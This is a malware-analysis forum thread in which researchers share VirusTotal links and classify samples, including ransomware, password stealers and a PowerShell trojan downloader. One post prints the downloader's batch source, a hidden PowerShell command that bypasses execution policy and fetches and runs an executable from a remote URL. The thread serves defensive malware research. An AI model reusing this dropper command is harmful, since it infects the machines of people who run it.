[ikolor]

next..''''''''''''''''''''''''''''''xors''''''''''''''''''''''' This is just hunting.

https://www.virustotal.com/en/file/f300 ... 467569927/

https://www.virustotal.com/en/file/1bfa ... 467571894/

[ikolor]

Next ..
No I do not have it.
https://www.virustotal.com/en/file/7dba ... /analysis/



https://www.virustotal.com/en/file/ccd3 ... 467829542/

[EP_X0FF]

Next ..
No I do not have it.
https://www.virustotal.com/en/file/7dba ... /analysis/



https://www.virustotal.com/en/file/ccd3 ... 467829542/

t3.exe - Ransom/Falock
complaint65648.pdf.bat - PowerShell/Ploprolo (trojan downloader)
email.exe - MSIL/Silog (PWS)
ewinoz.exe - MSIL/Silog (PWS)
updater.exe - MSIL/Noancooe

From my point of view, most interesting in this package of complete crapware (even for malware standards) is Ploprolo

Code: Select all

@ECHO OFF
start /min
REM  QBFC Project Options Begin
REM  HasVersionInfo: Yes
REM  Companyname: Tbfdgrsbnfouhdfbvifdb LLC
REM  Productname: ifnbfdnibdfbijdfn
REM  Filedescription: 
REM  Copyrights: Copyright 2013. All Rights Reserved. vojnfdjbnijdfbnidf LLC
REM  Trademarks: 
REM  Originalname: 
REM  Comments: 
REM  Productversion:  1. 3. 1. 2
REM  Fileversion:  1. 3. 0. 2
REM  Internalname: 
REM  Appicon: 
REM  AdministratorManifest: No
REM  QBFC Project Options End

@echo off
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://s3-us-west-1.amazonaws.com/docs.pdf/t4.exe','%APPDATA%\winstrt.exe'); cmd /c '%APPDATA%\winstrt.exe'

So this zoo moved to dedicated thread.

[EP_X0FF]

next..''''''''''''''''''''''''''''''xors''''''''''''''''''''''' This is just hunting.

https://www.virustotal.com/en/file/f300 ... 467569927/

https://www.virustotal.com/en/file/1bfa ... 467571894/

complaint75648.pdf.bat - PowerShell/Ploprolo
winstrts.exe - Ransomware
download-W.exe - PUP NSIS installer, trash - removed
download-WT.exe - NSIS installer (broken), trash - removed